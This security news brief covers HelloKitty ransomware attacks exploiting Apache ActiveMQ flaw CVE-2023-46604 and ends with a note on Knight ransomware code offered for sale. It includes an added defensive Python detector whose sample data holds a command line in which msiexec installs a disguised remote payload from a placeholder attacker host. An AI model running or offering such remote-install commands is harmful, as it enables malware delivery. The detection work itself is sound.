Organizations running Apache ActiveMQ servers that are vulnerable to the maximum-severity remote code execution flaw tracked as CVE-2023-46604 have been targeted in attacks attributed to the HelloKitty ransomware operation, The Hacker News reports.
After exploiting the vulnerability, which has been fixed in the recently released ActiveMQ versions 5.15.16, 5.16.7, 5.17.6, and 5.18.3, the threat actors used the Windows Installer to load the remote binaries M2.png and M4.png, according to a Rapid7 report.
Further examination showed that both files contain a .NET executable that deploys the EncDLL payload, which carries the ransomware functionality: it first terminates running processes and then encrypts files.
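The post-exploitation step above (Windows Installer fetching binaries that are disguised as .png images) is something a defender can hunt for in process-creation telemetry. The following detection logic is an added example, not code from Rapid7 or from the reporting; the event records are constructed, the field names `image` and `cmdline` are assumed, and the attacker host is a placeholder.

```python
import re
from urllib.parse import urlparse

# Constructed Sysmon-style process-creation records (not real telemetry):
# one legitimate local install, one matching the M2.png pattern described
# above, and one unrelated process that also references a remote .png.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Temp\vendor-agent.msi" /qn'},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /q /i http://ATTACKER-HOST-PLACEHOLDER/M2.png"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe http://intranet.example/readme.png"},
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Extensions that Windows Installer has no legitimate reason to fetch as
# a package; a match strongly suggests a disguised executable.
NON_PACKAGE_EXT = {".png", ".jpg", ".jpeg", ".gif", ".txt", ".log"}


def find_remote_msiexec(events):
    """Return (cmdline, url, reason) for every msiexec launch whose package
    source is a remote URL; a non-package extension is called out explicitly."""
    findings = []
    for ev in events:
        # Only Windows Installer launches are in scope for this rule.
        if not ev["image"].lower().endswith("\\msiexec.exe"):
            continue
        m = URL_RE.search(ev["cmdline"])
        if not m:
            continue  # local package path: not a remote load
        url = m.group(0).rstrip('"')
        path = urlparse(url).path.lower()
        ext = path[path.rfind("."):] if "." in path else ""
        if ext in NON_PACKAGE_EXT:
            reason = f"remote payload with non-package extension {ext}"
        else:
            reason = "remote package source"
        findings.append((ev["cmdline"], url, reason))
    return findings


if __name__ == "__main__":
    for cmd, url, why in find_remote_msiexec(SAMPLE_EVENTS):
        print(f"ALERT [{why}]: {cmd}")
```

Any remote package source for msiexec deserves a look; the .png case is the one that matches this campaign, so it is the one to escalate first.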
"Based on the ransom note and available evidence, we attribute the activity to the HelloKitty ransomware family, whose source code was leaked on a forum in early October," said Rapid7 researchers.
Meanwhile, the Shadowserver Foundation found more than 3,300 ActiveMQ servers still vulnerable to CVE-2023-46604, most of them in China, the U.S., and Germany.
BleepingComputer reports that KELA threat analysts observed the third iteration of the Knight ransomware's source code being offered for sale on the RAMP forum by the operation's representative, Cyclops.